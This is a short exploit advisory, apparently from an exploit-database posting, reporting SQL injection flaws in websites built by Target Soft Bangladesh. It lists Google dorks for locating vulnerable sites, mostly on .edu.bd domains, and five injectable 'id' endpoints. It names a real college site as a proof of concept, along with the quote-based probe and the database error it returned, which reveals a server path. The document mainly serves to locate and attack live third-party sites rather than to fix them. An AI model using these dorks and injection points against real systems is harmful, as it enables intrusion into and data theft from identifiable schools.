#################################################################################################
# Exploit Title : Design & Developed By Target Soft Bangladesh SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 05/09/2018
# Vendor Homepage : targetsoftbd.com
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
#################################################################################################
# Google Dorks : intext:''All contents copyright © 2015 . All rights reserved Design & Develope By : Target Soft''
intext:Design & Develope By : Target Soft'' site:edu.bd
intext:Design & Developed By : Target Soft'' site:edu.bd
# Exploits :
/view_notices.php?id=[SQL Injection]
/view_page.php?id=[SQL Injection]
/view_teacher.php?id=[SQL Injection]
/view_stuccess_st.php?id=[SQL Injection]
/view_management.php?id=[SQL Injection]
#################################################################################################
# Example Site => dhakaoxfordintcollege.edu.bd/view_notices.php?id=40%27 => [ Proof of Concept ] => archive.is/Fh7Ni
# SQL Database Error =>
Warning: mysql_fetch_array() expects parameter 1 to be resource,
boolean given in /home/dhakaoxfordintco/public_html/view_notices.php on line 25
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################